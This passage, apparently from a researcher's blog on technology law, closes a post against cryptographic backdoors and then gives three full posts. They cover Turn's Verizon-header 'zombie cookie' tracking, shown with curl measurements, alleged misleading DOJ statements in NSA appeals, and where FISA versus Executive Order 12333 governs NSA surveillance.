“Sure,” the thinking runs, “it’s impossible to entirely block secure apps. But we don’t need a complete technology ban. We just need to disincentivize building these apps, by making them more difficult to design, distribute, and monetize. The best developers will walk away, and the best secure apps will disapper. That would still be a big win.”

Not so fast. Many secure software developers aren’t incentivized by financial reward. In fact, much of the best secure software is free, open source, and noncommercial. And for those developers who do wish to monetize, there are a plethora of viable options.¹⁰

As for app design and distribution, that was the discussion earlier. Unless the government is prepared to adopt technology sector regulation that is politically infeasible, inconsistent with prior policy, and possibly unconstitutional, it just can’t do much to obstruct secure apps.

Concluding Thoughts

The frustration felt by law enforcement and intelligence officials is palpable and understandable. Electronic surveillance has revolutionized both fields, and it plays a legitimate role in both investigating crimes and protecting national security. The possibility of losing critical evidence, even if rare, should be cause for reflection.

Cryptographic backdoors are, however, not a solution. Beyond the myriad other objections, they pose too much of a cost-benefit asymmetry. In order to make secure apps just slightly more difficult for criminals to obtain, and just slightly less worthwhile for developers, the government would have to go to extraordinary lengths. In an arms race between cryptographic backdoors and secure apps, the United States would inevitably lose.

Image credits: door, lock, Android bouncer, and Android app kill switch.

1. By international, I mean a project that has international contributors and could easily be coordinated from a foreign location.

2. Google could, for instance, implement a system like SecureDrop for app submissions. I don’t expect that it’s likely, but it is feasible. The government counter-move would be to require Google to adopt a real-name policy for app submissions. Given how critical the United States has been of foreign governments that have imposed similar policies (e.g. China), that seems even more unlikely.

3. I suppose another direction would be to entirely forbid alternative app stores and sideloaded apps. Unless the federal government is prepared to kibosh open platforms, and to require that Android be a walled garden like iOS, that’s even more of a non-starter.

4. There could also be a Fifth Amendment (takings) or Second Amendment (self-defense) challenge. I don’t think the caselaw supports the former, though, and there isn’t yet much caselaw on the latter.

5. Alternatively, the user could be directed to compile the app for themselves with Google’s free Android development kit.

6. Another circumvention of the kill switch, albeit one that’s somewhat more challenging for users, is installing a variant of Android. The popular CyanogenMod operating system, for instance, has particularly good privacy and security features. It likely wouldn’t honor government cryptography takedown requests. The only solution: lock Android users into the pre-installed operating system. That won’t sit well with tinkerers, to be sure. And it puts users at risk—device vendors and carriers are notoriously slow to push out Android updates, so variants of Android can be a more secure alternative.

7. The government could, alternatively, demand an ability to remotely observe device usage. At that point, though, the conversation is much more about government hacking than cryptographic backdoors.

8. There is, presumably, a small subset of not-so-smart criminals who stumble into a secure configuration. The behavioral economics work in computer security and privacy has consistently found that defaults dictate outcomes. There’s even some (indirect) empirical evidence that the overwhelming majority of iOS users have backups enabled, since the overwhelming majority of iOS users quickly receive major OS updates.

9. The absence of a backdoor could slightly delay prospective government access to data. In order to intercept future iMessages, for instance, the government would have to wait until the target’s iPhone backed up to iCloud. That seems a minute investigative burden, and at any rate, law enforcement agencies rarely engage in prospective content interception. (It necessitates a wiretap order, which goes far beyond the requirements of an ordinary warrant.)

10. A range of advertising models come to mind. Just look at the booming ecosystem of questionable “file locker” websites.

The Turn-Verizon Zombie Cookie

jonathan — Wed, 14 Jan 2015 20:26:55 +0000

Verizon Wireless injects a unique header into customer web traffic. When the practice came to light last year, it was widely panned. Numerous security researchers pointed out that this “supercookie” could trivially be used to track mobile subscribers, even if they had opted out, cleared their cookies, or entered private browsing mode.¹ But Verizon persisted, emphasizing that its own business model did not use the header for tracking.

Out of curiosity, I went looking for a company that was taking advantage of the Verizon header to track consumers. I found one—Turn, a headline Verizon advertising partner. They’re “bringing sexy back to measurement.”

Warning Signs

There are, roughly, two ways that a website could track a user with the Verizon header. The sneaky way is to surreptitiously correlate values on the backend. Detecting that is quite tricky. (Though there’s been impressive research progress in the past couple years.)

The ~~brazen~~ ~~lazy~~ transparent way is to bolt the header onto existing cookie tracking. If a user’s ID cookie is missing, simply reconstruct it from their Verizon header. In the rich jargon of online privacy, these are dubbed “zombie cookies.” They rise from the grave.²

In late December, I went Verizon zombie hunting. I began by developing a basic web crawler with PhantomJS. It visited popular websites, clearing cookies after each page. On the first run, it spoofed a Verizon advertising header.³ On the second run, it used a vanilla configuration. A post-processing script then scanned for lengthy cookie values that recurred only in the Verizon crawl.

The uid cookie on turn.com immediately appeared suspicious. The same unique value was restored on over a hundred pages.

Undead Cookies

Confirmation was easy. A request to certain Turn resources, sans Verizon header, simply drops a uid cookie.

$ curl -D - "http://ad.turn.com/server/ads.js"
...
Set-Cookie: uid=2415230717135370700; Domain=.turn.com; ...

Each cookieless request results in a new ID.

$ curl -D - "http://ad.turn.com/server/ads.js"
...
Set-Cookie: uid=4425321986559530189; Domain=.turn.com; ...

So far, no surprises. When requests include a Verizon header, though, the subsequent response behavior is different.

$ curl -H "X-UIDH: OTgxNT..." -D - "http://ad.turn.com/server/ads.js"
...
Set-Cookie: uid=4012847891611109688; Domain=.turn.com;...

$ curl -H "X-UIDH: OTgxNT..." -D - "http://ad.turn.com/server/ads.js"
...
Set-Cookie: uid=2539356028667362074; Domain=.turn.com;...
Set-Cookie: uid=4012847891611109688; Domain=.turn.com;...

As before, there’s a new ID. But a second Set-Cookie header appears; it trumps the first header and restores the old ID.⁴

Turn does not seem to validate the Verizon header. Sending a totally bogus value, for instance, still results in a zombie cookie.

$ curl -H "X-UIDH: totallybogus" -D - "http://ad.turn.com/server/ads.js"
...
Set-Cookie: uid=8323135681340417635; Domain=.turn.com;...

$ curl -H "X-UIDH: totallybogus" -D - "http://ad.turn.com/server/ads.js"
...
Set-Cookie: uid=3259412905334729433; Domain=.turn.com;...
Set-Cookie: uid=8323135681340417635; Domain=.turn.com;...

The respawning logic also appears to be naïve. It seems to simply replay the latest ID value associated with the header.⁵

$ curl -H "X-UIDH: fake" -H "Cookie: uid=123456789" -D - "http://ad.turn.com/server/ads.js"
...
Set-Cookie: uid=123456789; Domain=.turn.com;...

$ curl -H "X-UIDH: fake" -D - "http://ad.turn.com/server/ads.js"
...
Set-Cookie: uid=3647115064319153191; Domain=.turn.com;...
Set-Cookie: uid=123456789; Domain=.turn.com;...

I tried moving between IP addresses and User-Agents, in case those factored into Turn’s behavior. The zombie cookie remained.

Because of implementation quirks, the zombie cookie might not always stick.⁶ But the basic design and effect are straightforward.

Cookie Contagion

The privacy impact does not, unfortunately, end with Turn. Over the past five years, the online advertising market has shifted from monolithic advertising networks to fragmented advertising exchanges. A technical consequence is that advertising firms routinely swap ID values. In industry lingo, it’s call “cookie syncing.”

In my crawl, Turn’s zombie cookie was sent to or from over thirty other businesses.⁷ They included Google, Facebook, Yahoo, Twitter, Walmart, and WebMD. How those firms use Turn’s ID, I can’t say—it’s entirely possible that some unknowingly tracked users with a zombie value. They certainly possessed sufficient information.⁸ It’s especially likely for businesses that dropped their own tracking cookie with Turn’s ID.⁹

The privacy impact also goes beyond individual mobile browsers. If a Verizon customer tethered with their phone, their notebook could get stuck with the zombie value. (The ultimate in cross-device advertising!) And the zombie value could spread between cookie stores on a device, including between the web browser and individual apps. (The ultimate in inter-app advertising!)

In sum, there are widespread collateral consequences from Turn’s zombie cookie.

No Escape

If a Verizon Wireless subscriber objects to Turn’s tracking, what’s their recourse? Well, both Verizon and Turn offer opt outs. You might think those would be effective. You would think wrong.

Verizon provides two separate privacy choices related to the header: “Relevant Mobile Advertising” and “Verizon Selects.” Steve Englehardt has compiled a convenient comparison of these programs.¹⁰

The accounts that I tested had both Relevant Mobile Advertising and Verizon Selects disabled, as well as every other controllable form of Verizon information sharing. Turn’s zombie cookies kept coming back.

These preferences don’t actually stop Verizon from injecting a unique advertising header. They merely stop Verizon from passing along additional customer information. If a business is using the header as a tracking identifier—like Turn is—the Verizon preferences are entirely ineffective.

Turn’s privacy option also fails to prevent its zombie cookies. I checked by opting out on Turn’s website,¹¹ a process that drops an optOut=1 cookie and expires ID cookies.¹²

I then cleared browser state and visited websites where Turn’s zombie cookie had previously respawned. The uid tracking cookie came back.

What’s more, the optOut cookie—which is supposed to prevent behavioral ad targeting—did not get resurrected. According to Turn’s own status check, the user’s preference against behavioral advertising was gone.

Status checks for advertising self-regulatory programs confirmed that Turn would use its tracking data for behavioral advertising.¹³

So, what’s a Verizon subscriber to do? Ad blocking would be effective, but it isn’t supported by the stock Android or iOS browsers. Using a VPN or other secure proxy would work, though that’s quite cumbersome. For an ordinary user, there simply is no defense.

Are These Zombies Legal?

Commercial supercookies, fingerprinting, and zombie cookies are tolerated (if not permitted) under current United States law.¹⁷ Any associated consumer deception, however, is a violation of the Federal Trade Commission Act and parallel state statutes.

I think a consumer deception claim would succeed against Turn. One theory is deception by omission: Turn failed to disclose its zombie cookie practice. Turn’s privacy policy speaks volumes about cookies, but says nothing about the Verizon header.

This isn’t a novel legal theory. The FTC previously used it against Epic Marketplace, for failing to disclose a non-cookie tracking technology. (That case was based on a prior project.) Even an advertising industry self-regulatory body acknowledged that non-cookie tracking requires special notice.

Another viable theory against Turn is that its opt-out mechanism is deceptive. The advertising industry’s self-regulatory guidelines say this:

The technologies that members use for [behavioral advertising] purposes must provide users with an appropriate degree of transparency and control.

It’s weak language, to be sure. Ordinarily, the “appropriate” control is opt-out, difficult to find, implemented as a flimsy cookie, and limits only ad targeting (not tracking!).

In the context of non-cookie tracking technologies, though, the text does have a little bite. A company can use a tracking mechanism that is stickier than a cookie. But for the “control” to be “appropriate,” it must be at least as sticky as the tracking. That’s not just a sensible interpretation—that’s the advertising industry’s own interpretation.

Companies must also ensure that their [behavioral advertising] opt-out mechanism provides consumers with real choice, which may require linking their back-end technologies to existing opt-out mechanisms so that they will function seamlessly no matter what technology is being employed.

As noted above, Turn does not link its Verizon header tracking to a consumer’s opt-out choice.

Are These Headers Legal?

The ideal enforcement target is, of course, Verizon. They started this whole header mess, and they can finish it. Others have previously argued that the unique header violates telecom customer privacy obligations. That might be.¹⁴

Given Turn’s zombie cookie practice, I think there’s also a good FCC, FTC, or state deception case against Verizon.¹⁵ The company has consistently misrepresented the privacy properties of its header, and especially the impact of its opt-out preferences.

In its explanation of the advertising header, Verizon says:

It is unlikely that sites and ad entities will attempt to build customer profiles for online advertising or any other purpose using the [header] . . . .

Security researchers disagreed. We were right.

For ad tech entities that have a presence on many websites, the [header] does not provide any information beyond . . . other already existing IDs.

False. The header enables more persistent tracking than other technologies, especially on mobile platforms.¹⁶

When a customer opts out of [Verizon advertising programs] the [header] cannot be used for advertising purposes because there is no information associated with it available to our ad partners.

Also false. Turn is using the header for ad tracking, and Verizon’s opt-out preferences do not alter Turn’s practices. This is precisely the scenario that security researchers warned about.

When a customer opts out, our partners receive no information, anonymized or otherwise, about those customers.

Again, false. Turn is a partner. And it’s receiving some information about the customer—a persistent unique identifier.

Since the [header] was implemented in 2012, we are not aware of any uses of the [header] other than the intended uses we have described here.

Might want to change that.

Verizon’s statements to the press are also inaccurate. Wired:

According to Verizon spokeswoman Debra Lewis . . . if you opt out of the company’s [header advertising program], then Verizon and its advertising partners won’t be using [the header] to create targeted ads.

Nope. CIO (and customer support):

Verizon spokeswoman Debra Lewis says . . . “If/when a customer opts out . . . there is NO information associated with the ID and therefore, no ability to use it for advertising purposes.”

Negative. Washington Post:

A company spokeswoman, Adria Tomaszewski, said . . . those who are not part of the Verizon advertising program . . . are not able to use the supercookie to track Verizon customers.

“The way it’s built, it wouldn’t be able to be used for that,” Tomaszewski said.

You get the idea.

Concluding Thoughts

Internet service providers are in a trusted position. They can arbitrarily observe and tamper with all of a customer’s traffic. What’s more, in the wireless space, carriers can exert control over a customer’s devices.

When ISPs have breached that trust to snoop on subscribers, they’ve landed in trouble. Debacles involving NebuAd, Phorm, and Carrier IQ come to mind. The reasons are evident: consumers have limited information, limited choice, and limited control.

Advertising headers are no different. AT&T has already yanked its program; it’s past time for Verizon to do the same.

Sometimes I write (shorter) stuff at @jonathanmayer.

I owe a debt of gratitude to Steven Englehardt, Arvind Narayanan, Jacob Hoffman-Andrews, and other friends and colleagues who contributed to this work. All views and errors are solely my own.

The graphics in this post remix resources that are Creative Commons licensed.

1. The only viable defense against the Verizon header is securing all traffic through Verizon’s network, e.g. with a VPN.

2. Researchers have previously spotted zombie cookies using Flash LSOs, HTML5 storage, HTTP ETags, and other tracking technologies. John Mitchell and I wrote a survey paper a few years ago synthesizing possibilities.

3. Specifically, I used my own header value from October.

4. Some Turn resources were a little more subtle, responding with just the old ID value. For instance:

$ curl -H "X-UIDH: OTgxNT..." -D - "http://d.turn.com/r/du/"
...
Set-Cookie: uid=4012847891611109688; Domain=.turn.com;...

5. In my crawls, I saw more than one ID value get respawned. That suggests that Turn’s mechanism for associating an ID with an X-UIDH header is more convoluted than merely storing and replaying a single value.

Also, I tried testing with an older and newer Verizon header for the same device. They received different ID values, suggesting Turn is treating the header as an opaque identifier.

I should note that Turn’s implementation allows a website to steal a user’s uid value. That could, potentially, allow an adversary to learn coarse information about the user’s browsing activity (e.g. based on ads displayed).

6. Not all Turn resources receive the Verizon header (e.g. those loaded over HTTPS or over a non-Verizon network). Also, not all Turn resources respawn cookies. An example:

$ curl -H "X-UIDH: OTgxNT..." -D - "http://ad.turn.com/r/cs"
...
Set-Cookie: uid=4375890934513601832; Domain=.turn.com;...

If the browser does not have a uid cookie, and some of these resources are also embedded, a race condition arises between HTTP transactions. The browser can thrash between new and old cookie values, depending on request and response timing. In my testing, a zombie cookie was the most common end state.

7. A post-processing script checked URLs, referrers, and cookies for the zombie value. The results are available in a spreadsheet. Based on Turn’s partner APIs, as well as observations from Steven Englehardt, it appears other companies may have received the zombie value.

8. The Verizon header itself, of course, is sufficient information for persistent tracking. The header rotates periodically, however, making Turn’s zombie cookies more robust.

9. Assuming these firms keep HTTP request logs with cookie values, they’d have a zombie IDed database of user web browsing activity.

10. My understanding is the same as Steve’s. Relevant Mobile Advertising is an opt-out program that facilitates demographic and consumer profile targeting. It may also incorporate some behavioral targeting; Verizon’s language is ambiguous. Verizon Selects is a compensated opt-in program; it covers location-based and behavioral targeting.

11. A similar process is available on industry self-regulatory websites.

12. The uid value can subsequently respawn or be reassigned, before the user has cleared their cookies.

13. It’s possible that Turn has an opt-out preference stored on its backend, tied to an X-UIDH header or uid cookie value. The technical evidence suggests otherwise—that would render the optOut cookie entirely redundant and mean all three status checking mechanisms are broken. The definitive answer is in Turn’s backend which, of course, I can’t audit.

14. To my knowledge, no regulatory agency has yet challenged one of these practices as inherently “unfair” or “deceptive” in violation of consumer protection law.

15. One theory is that the header constitutes an unauthorized disclosure of “customer proprietary network information” (CPNI) under Section 222(c) of the Communications Act. Another basis for liability is that the header is “proprietary information” under Section 222(a), a new theory articulated by the FCC in a recent data breach case.

16. In this area, the Federal Communications Commission, the Federal Trade Commission, and the state attorneys general have concurrent authority. The FCC’s deception authority would stem from the Open Internet Order or Section 201 of the Communications Act.

17. According to several journalists, Verizon is keen to compare the header to Apple’s Advertising Identifier on iOS. That ID, while problematic, does have more favorable privacy properties. It isn’t accessible from the browser, users can forcibly change it, there’s an associated privacy signaling mechanism (“Limit Ad Tracking”), and all app developers are bound by enforceable conditions on using it.

In NSA Appeals, DOJ Misleads About Medical and Financial Records

jonathan — Thu, 11 Dec 2014 20:53:49 +0000

Earlier this week, the Ninth Circuit heard oral arguments in a challenge to the NSA’s phone metadata program. While watching, I noticed some quite misleading legal claims by the government’s counsel. I then reviewed last month’s oral arguments in the D.C. Circuit, and I spotted a similar assertion.

In both cases, the government attorney waved away constitutional concerns about medical and financial records. Congress, he suggested, has already stepped in to protect those files.

With respect to ordinary law enforcement investigations, that’s only slightly true. And with respect to nation security investigations, that’s really not right.

Medical Records

During Smith, the Ninth Circuit case, there was an extended line of questioning about various sorts of business records. Judge Hawkins kicked it off:

Suppose the National Security Agency wanted access to all utility records. Nationwide. Would that rationale apply?

Subsequent discussion touched on hotel and financial records. Then Judge McKeown asked:

What about medical records?

The Department of Justice attorney responded:

Well medical records, Judge McKeown I’m so glad you asked that because this is really an important point, medical records would be subject to HIPAA, among other protections.

A similar question in Klayman, the D.C. Circuit case, drew a similar response.

HIPAA, in your example Judge Brown, would govern the restrictions, would impose restrictions on the proper use of medical information.

Later in the Smith argument, counsel reemphasized the importance of HIPAA, including:

But I think the significance of HIPAA can’t be discounted.

By way of background, the Health Insurance Portability and Accountability Act is the primary federal law that addresses health records. Under HIPAA, the Department of Health and Human Services is empowered to promulgate detailed privacy rules.

Here’s the catch: the HIPAA privacy rules have special exceptions for law enforcement and national security investigations.

The law enforcement provision is very broad. It covers all the usual police procedures, including subpoenas. Those don’t require a judge’s advance permission, and they also require much less basis than probable cause.

The national security exception is, of course, even more pertinent to the Smith and Klayman cases. And it’s even broader.

A covered entity may disclose protected health information to authorized federal officials for the conduct of lawful intelligence, counter-intelligence, and other national security activities authorized by the National Security Act (50 U.S.C. 401, et seq.) and implementing authority (e.g., Executive Order 12333).

In non-legalese: HIPAA just doesn’t apply to the NSA.¹ And yet, in two separate NSA appeals, the government has emphasized HIPAA.²

Financial Records

In the Smith argument, government counsel twice noted that Congress has enacted privacy protections for financial records.

Following Miller, Congress enacted the financial privacy protections by statute.

In response to Miller, that Congress enacted a bank records protection of privacy . . .

Similarly, in Klayman:

For example, following the Miller case, Congress passed a statute governing the secrecy of bank records.

As background, United States v. Miller held that routine financial records are not protected by the Fourth Amendment. Two years later, Congress passed the Right to Financial Privacy Act… which largely codified Miller. Law enforcement agencies can still access financial records with just a subpoena.³

What’s more, RFPA includes a special set of national security procedures. Federal grand jury subpoenas and warrants aren’t covered by RFPA, so long as the investigating agency self-certifies “there may result a danger to the national security of the United States.”

RFPA also includes a National Security Letter provision. In counter-intelligence and counter-terrorism investigations, the FBI (and, by proxy, the NSA) doesn’t even need a grand jury subpoena. It can demand financial records with a mere self-certification.

So, once again: in a national security appeal, why emphasize privacy protections that don’t extend to national security investigations?

Section 215 of the USA PATRIOT Act

The precise statutory provision at issue in Smith and Klayman is Section 215 of the USA PATRIOT Act. It allows FBI (and NSA) access to any business records when conducting a counter-intelligence or counter-terrorism investigation.⁴ A FISA judge’s approval is required, though the standard for issuance is very low.

Section 215 covers medical records. A part of the statute, in fact, expressly addresses them.

Section 215 also covers financial records. In a 2010 opinion, the FISA Court held as much. And, in fact, the CIA operates a bulk financial surveillance program under Section 215.

In sum: not only are national security investigations generally outside HIPAA and RFPA, but the very same authority at issue in Smith and Klayman allows access to medical and financial records.

Concluding Thoughts

Reasonable minds can disagree on whether the government’s representations in Smith and Klayman were literally false. At minimum, they were highly misleading.

United States privacy law is notoriously convoluted. But this much is certain: medical and financial records are, by statute and rule, readily available to the intelligence community. The executive branch shouldn’t even hint otherwise.

Thanks to the colleagues who provided feedback on the legal analysis in this post. All views are solely my own.

1. In most instances of domestic surveillance, NSA requests are passed through the FBI. Since the National Security Act designates the FBI as a member of the intelligence community, its national security investigations are also unregulated by HIPAA.

2. In a charitable interpretation, the attorney misspoke while attempting to note that Congress can craft more nuanced privacy rules than the courts, and that Congress can provide privacy protections beyond the Fourth Amendment. Those points are undoubtedly true, though undoubtedly known to the judges.

3. A plain reading of RFPA suggests some privacy protection: targets receive advance notice of a subpoena and have an opportunity to contest the subpoena. In everyday practice, however, RFPA’s delayed notice provisions have swallowed the rule. Law enforcement agencies routinely obtain court orders that both eliminate the advance notice requirement and temporarily gag financial institutions from disclosure.

4. Where U.S. persons aren’t involved, any foreign intelligence purpose is sufficient.

Executive Order 12333 on American Soil, and Other Tales from the FISA Frontier

jonathan — Wed, 03 Dec 2014 18:31:42 +0000

When the National Security Agency collects data inside the United States, it’s regulated by the Foreign Intelligence Surveillance Act. There’s a degree of court supervision and congressional oversight.

When the agency collects data outside the United States, it’s regulated by Executive Order 12333. That document embodies the President’s inherent Article II authority to conduct foreign intelligence. There’s no court involvement, and there’s scant legislative scrutiny.

So, that’s the conventional wisdom. American soil: FISA. Foreign soil: EO 12333. Unfortunately, the legal landscape is more complicated.

In this post, I’ll sketch three areas where the NSA collects data inside the United States, but under Executive Order 12333. I’ll also note two areas where the NSA collects data outside the United States, but under FISA.

If you’re a visual learner, or you’d prefer a TL;DR, here’s a diagram.¹

Transit Authority (Two-End Foreign Wireline Communications)

The United States is the world’s largest telecommunications hub. Internet traffic and voice calls are routinely routed through the country, even though both ends are foreign.

According to leaked documents, the NSA routinely scoops up many of these two-end foreign communications as they flow through American networks.² The agency calls it “International Transit Switch Collection,” operated under “Transit Authority.” That authority stems from Executive Order 12333, not the Foreign Intelligence Surveillance Act.

How, you might wonder, is the program legal? Hasn’t Congress established “the exclusive means by which electronic surveillance . . . may be conducted” on American soil?

After poring over declassified and leaked materials, I haven’t found a clear explanation. So, working backward from the relevant statutes, here’s my best reconstruction of the NSA’s legal theory. Transit Authority is a three-step dance through FISA and the Wiretap Act, and I think it’s fairly persuasive.

1. This Isn’t “Electronic Surveillance” Under FISA

The term “electronic surveillance” has a precise (and counterintuitive) meaning in FISA. There are multiple parts to the definition; the component that directly addresses wireline intercepts is 50 U.S.C. § 1801(f)(2). It encompasses:

the acquisition . . . of the contents of any wire communication to or from a person in the United States . . . if such acquisition occurs in the United States

A two-end foreign communication is, of course, not “to or from a person in the United States.” When the NSA intercepts a two-end foreign wireline communication, then, it hasn’t engaged in “electronic surveillance.”³

Much of FISA is scoped to the term “electronic surveillance,” including some key exclusivity provisions. Just by navigating that definition, the NSA can largely escape FISA’s restrictions.

2. This Falls into the Wiretap Act’s Foreign Intelligence Exception

Since 1968, the Wiretap Act has been the primary statutory scheme that regulates government interception of communications content. As you would expect, “electronic surveillance” that is authorized by FISA is also allowed by the Wiretap Act.⁴ But what about an NSA interception, inside the United States, that doesn’t count as “electronic surveillance”?

Many legal observers have assumed that the Wiretap Act and FISA are coextensive.⁵ Even the Congressional Research Service concluded as much. If a government agency intercepts content inside the United States, the thinking goes, it has two options. It can follow the law enforcement procedures, under the Wiretap Act. Or it can follow the (often lax) foreign intelligence procedures, under FISA. That legal structure would make sense—but it’s not how the law stands.

There is, in fact, a doughnut hole between the Wiretap Act and FISA. It’s located in 18 U.S.C. § 2511(2)(f), and it provides:

Nothing contained in [the Wiretap Act, the Stored Communications Act, or the Pen Register Act] shall be deemed to affect the acquisition by the United States Government of foreign intelligence information from international or foreign communications . . . utilizing a means other than electronic surveillance as defined in [FISA] . . . .

Let me unpack that dense legalese. Assume an intelligence agency intercepts a one-end foreign communication inside the United States.⁶ If the interception isn’t covered by FISA, it still isn’t covered by the Wiretap Act. There’s a gap between the two statutory schemes.

3. These Aren’t “Domestic” Communications Under FISA and the Wiretap Act

Both the Wiretap Act and FISA include exclusivity provisions. The Wiretap Act text, in 18 U.S.C. § 2511(2)(f), reads:

[Procedures] in [the Wiretap Act, the Stored Communications Act, and FISA] shall be the exclusive means by which electronic surveillance, as defined in [FISA], and the interception of domestic wire, oral, and electronic communications may be conducted.

The similar FISA text, in 50 U.S.C. § 1812, says:

Except as [otherwise expressly authorized by statute,] the procedures of [the Wiretap Act, the Stored Communications Act, the Pen Register Act, and FISA] shall be the exclusive means by which electronic surveillance and the interception of domestic wire, oral, or electronic communications may be conducted.

Once again unpacking the legalese, these parallel provisions establish exclusivity for 1) “electronic surveillance” and 2) interception of “domestic” communications. As I explained above, intercepting a two-end foreign wireline communication doesn’t constitute “electronic surveillance.” As for what counts as a “domestic” communication, the statutes seem to mean a communication wholly within the United States.⁷ A two-end foreign communication would plainly flunk that definition.

So, there’s the three-step maneuver. If the NSA intercepts foreign-to-foreign voice or Internet traffic, as it transits the United States, that isn’t covered by either FISA or the Wiretap Act. All that’s left is Executive Order 12333.

Satellite Surveillance (One-End Foreign Wireless Communications)

A recently declassified 2008 oral argument contains this gem from the government’s counsel:

And one aspect of [surveillance outside FISA] is the satellite communications, where you have [individuals] outside the United States communicating by satellite, and those messages are picked up at a satellite dish inside the United States. And for decades those communications have been outside the FISA process . . . .

The context of the attorney’s argument hinted that the NSA would collect not just two-end foreign satellite communications under Executive Order 12333, like the Transit Authority, but also one-end foreign communications.⁸ A leaked diagram of the NSA’s authorities also suggests that domestic collection of one-end foreign satellite communications is outside FISA.⁹

I once more couldn’t find a public explanation, so I again attempted a statutory reconstruction. A very similar three-step legal theory would place one-end foreign radio communications under Executive Order 12333.

1. This Isn’t “Electronic Surveillance” Under FISA

Here’s the part of the “electronic surveillance” definition that bears on radio communications:

the intentional acquisition . . . of the contents of any radio communication . . . if both the sender and all intended recipients are located within the United States

In less legalese, a radio interception is “electronic surveillance” only if every party is inside the United States.¹⁰ The rule for wireline¹¹ communication, by contrast, is more strict; there is “electronic surveillance” if any party is inside the United States.

2. This Falls into the Wiretap Act’s Foreign Intelligence Exception

This argument would be the same as for two-end foreign wireline communications.

3. These Aren’t “Domestic” Communications Under FISA and the Wiretap Act

Again, the same.

The law that results is quite counterintuitive. If a communication is carried by radio waves, and it’s one-end foreign, it falls under Executive Order 12333. If that same communication were carried by a wire, though, it would fall under FISA. (Specifically, the Section 702 upstream program.)

As for how this Executive Order 12333 authority might be used beyond satellite surveillance, I could only speculate. Perhaps intercepting cellphone calls to or from foreign embassies?¹² Or along the national borders? At any rate, the FISA-free domestic wireless authority appears to be even broader than the Transit Authority.

Classified Annex Authority (Targeted Warrantless Surveillance)

A third area of Executive Order 12333, on American soil, is the “Classified Annex Authority” or “CAA.” Its source is a classified addition to Executive Order 12333, set out in an NSA policy document.¹³ The most recent revision, from 2009, reads:

Communications of or concerning a United States person¹⁴ may be intercepted intentionally or selected deliberately . . .

with specific prior approval by the Attorney General based on a finding by the Attorney General that there is probable cause to believe the United States person is an agent of a foreign power and that the purpose of the interception or selection is to collect significant foreign intelligence. Such approvals shall be limited to a period of time not to exceed ninety days for individuals and one year for entities.

That provision appears to allow the Attorney General to unilaterally trump FISA. I’m not entirely confident that’s what it means, but it sure looks like it.¹⁵

I’m skeptical that the executive branch can just brush aside FISA, especially on American soil. In Justice Jackson’s famous phrasing, when the executive branch acts in clear violation of a legislative enactment, its “power is at its lowest ebb.” Nevertheless, the executive branch does appear to claim that Article II can override FISA, and it does appear to have invoked this Classified Annex Authority on occasion.¹⁶

Surveillance Targeting Americans Worldwide

Much like Executive Order 12333 can operate on American soil, FISA can operate on foreign soil. The first area that I’d like to flag is surveillance intentionally directed against Americans. If the NSA targets a U.S. person, anywhere in the world, that’s covered by FISA. And it generally requires a court order.¹⁷

There are two sources for this protection. U.S. persons inside the United States are covered by the traditional FISA “electronic surveillance” provisions, even if interception occurs outside the United States.¹⁸ U.S. persons outside the United States are protected by the FISA Amendments Act, which added new procedures for if the person or both the person and the interception are outside the United States.

International Interception of Purely Domestic Wireless Communications

There is a second area of extraterritorial FISA that I’d like to note. It’s subtle, narrow, and probably not of much practical importance. It’s even further emphasis, though, of the quirky statutory coverage.

So, here it is: If the NSA intercepts a wireless communication, outside the United States, and all the parties to that communication are inside the United States, that’s covered by FISA.¹⁹ It doesn’t matter if the target is a foreigner.

Closing Thoughts

I hope you’re persuaded that the division between FISA and Executive Order 12333 is far more complicated than where an interception occurs. It also depends on the communications medium, the location of the parties to the communication, the U.S. personhood of the target, and (allegedly) the Attorney General’s willingness to override FISA.

I hope you’re also persuaded that FISA’s coverage formula is a questionable fit for modern technology. The definition of “electronic surveillance,” in particular, hasn’t been updated for 35 years. It predates the popularity of the Internet and cellphones, which have respectively generated enormous volumes of two-end foreign wireline and one-end foreign wireless communications.

Surveillance reformers and oversight bodies have, rightly, begun to more closely scrutinize Executive Order 12333. In the process, it’s important to recognize that there are FISA-free zones in our own backyard.

1. An NSA authority diagram has leaked, but it’s less precise. That, along with a declassified training manual, provided helpful structure for FISA’s contours.

This diagram, and this post, are focused on communications content. I should note that Executive Order 12333 could also operate on American soil, for collection of one-end foreign metadata. The argument is very similar to the Transit Authority theory; intercepting metadata is not “electronic surveillance” because the definition requires content, and the rest is the same.

2. Leaks do not indicate whether this is a bulk surveillance program, or a massive—but targeted—surveillance program.

3. A separate part of the “electronic surveillance” definition, 50 U.S.C. § 1801(f)(1), covers intercepts targeting U.S. persons inside the United States. I’ve lumped that provision into the last part of this post.

4. Specifically, 18 U.S.C. § 2511(2)(e) excepts FISA “electronic surveillance” from the Wiretap Act, the Stored Communications Act, and the Pen Register Act.

5. A 2005 letter from leading legal scholars, for instance, emphasized that the Wiretap Act and FISA are the sole authorities for surveillance within the United States.

6. I assume the terms “international” and “foreign” mean, respectively, one-end foreign and two-end foreign. That would be consistent with how the intelligence community has used those terms elsewhere, as well as the term “domestic” used in the Wiretap Act and FISA. As for the “foreign intelligence information” requirement, that term has exceedingly broad meaning.

7. The term “domestic” in FISA appears to contrast with the terms “international” and “foreign,” noted above.

8. The attorney was making an argument about how the Fourth Amendment’s warrant requirement hasn’t previously applied to foreign intelligence surveillance within the United States, targeting U.S. persons outside the United States. For purposes of this post, I’m focusing on the FISA analysis, not the constitutional issues. As for one-end foreign satellite communications, the hint was that U.S. persons abroad would likely communicate with individuals inside the United States. These intercepts would, consequently, include some one-end foreign communications.

9. A footnote in the diagram notes that satellite interception stations (“FORNSAT”) within the United States are not governed by FISA’s one-end foreign provision (Section 702), which would mean they are governed by Executive Order 12333.

10. Again, if the target is a U.S. person inside the United States, then it’s still “electronic surveillance.” See note 3 above.

11. The term “wire communication,” in FISA, means a wireline communication. In the Wiretap Act, and the Electronic Communications Privacy Act in general, it (confusingly) has a different meaning. There, the term means audio communictions, where any part of the transmission involves a wire.

12. There’s corroboration for this in the leaked NSA authority diagram. It suggests that some NSA Special Collection Service sites, within the United States, are regulated by Executive Order 12333. Leaked documents indicate that SCS surveils foreign embassies within the United States.

13. Specifically, NSA/CSS Policy 1-23 § 4.A.I.(a)(4). That document implements DoD Directive 5240.01, which in turn implements Executive Order 12333.

14. In this context, the term U.S. person is explicitly expanded to include aliens inside the United States.

